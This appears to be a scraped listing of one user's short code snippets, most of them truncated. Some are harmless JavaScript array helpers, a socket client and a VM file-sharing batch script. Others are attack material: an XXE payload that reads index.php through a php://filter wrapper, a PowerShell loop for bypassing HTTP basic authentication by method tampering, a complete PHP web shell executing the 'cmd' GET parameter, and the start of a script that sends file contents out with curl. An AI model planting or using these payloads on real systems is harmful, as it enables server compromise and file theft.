hddananjaya

import socket
import _thread
import time

class SocketClient:

  """ 
  Connect to a socket and send messages,
  Background forever thread for a reliable connection
  """

hddananjaya

<!-- Read Local Files using a PHP wrapper -->
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>

<rss version="2.0">
        <channel>

                <title>Example Feed</title>
                <description>Insert witty or insightful remark here</description>

hddananjaya

# Bypass basic http authentication by method tempering
$http_methods = "GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE"
foreach ($method in $http_methods){
	Try{
		$response = Invoke-WebRequest 'http://vuln.host' -Method $method
		Write-Host ("Vulnerable for $method method")
	}Catch{}
}

hddananjaya

<!-- PHP shell_exec() -->
<?php
	if (isset($_GET["cmd"])){
		$out=shell_exec($_GET["cmd"]);
		echo($out);
	}
?>

hddananjaya

:: Instantly copy files to VM shared folder
:: usage :
:: share /f file.file
:: share /d dir\
:: share /l
@echo off
set vm_shared_dir="D:\VBox-WinXP-shared\"
if "%1" equ "" (GOTO echo_usage)

if "%1" equ "/f" (

hddananjaya

# -------------------------------------------------------------
# quick script to read a file and transfer content using curl
# by @_hddananjaya
# -------------------------------------------------------------

import base64
import os

HTTPD = "127.0.0.1:8080"

hddananjaya

/* arr - Array
   index - int index to remove 
*/
function rm_arr (arr, index){
    arr.splice(index, 1);
    return (arr);   
}

hddananjaya

return (Math.max.apply(null, arr));

hddananjaya

function getPairs(arr){
  var pairsList = [];
  for (var i=0; i < arr.length - 1; i++){  
    for (var j=i+1; j < arr.length; j++){
      pairsList.push([arr[i], arr[j]]);
    }
  }
  return (pairsList);
}

hddananjaya